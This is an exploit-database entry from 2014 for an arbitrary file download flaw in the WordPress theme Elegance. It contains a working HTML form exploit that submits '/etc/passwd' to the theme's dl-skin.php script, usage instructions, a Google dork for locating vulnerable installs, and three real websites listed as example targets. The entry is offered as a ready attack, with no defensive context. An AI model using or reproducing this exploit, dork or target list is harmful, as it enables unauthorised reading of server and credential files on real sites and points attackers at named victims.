Wordpress Theme Elegance Arbitrary File Download Vulnerability

2014-06-20T00:00:00
ID 1337DAY-ID-22355
Type zdt
Reporter Aloulou
Modified 2014-06-20T00:00:00

Description

This exploit allows attacker to download any writable file from the server#### Usage Info Put the path of the file in the file's field of the exploit ,then click "Download" button then you get the file directly

                                        
                                            ############################################################################
 
# Title : Wordpress Theme Elegance Arbitrary File Download Vulnerability   
 
# Author : Aloulou                                             
 
# Date : 19/06/2014                                                    
 
# Facebook : http://www.facebook.com/Aloulou.TN                               
 
# Email: [email protected]
 
# Vendor : www.wordpress.org                                                     
 
# Google Dork : inurl:/wp-content/themes/elegance 
 
# Tested on : Linux
                        
 
 
############################################################################
 

 
Exploit:
 
<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value=Download>
</form>
</body>
</html>



    
 
Examples:
http://www.floridapace.gov
http://www.eglevskyballet.org
http://mudtitanrun.com
 
# Greeting to : Tunisia ,  CyberPink , AnonBoy and All muslims

#  0day.today [2018-02-09]  #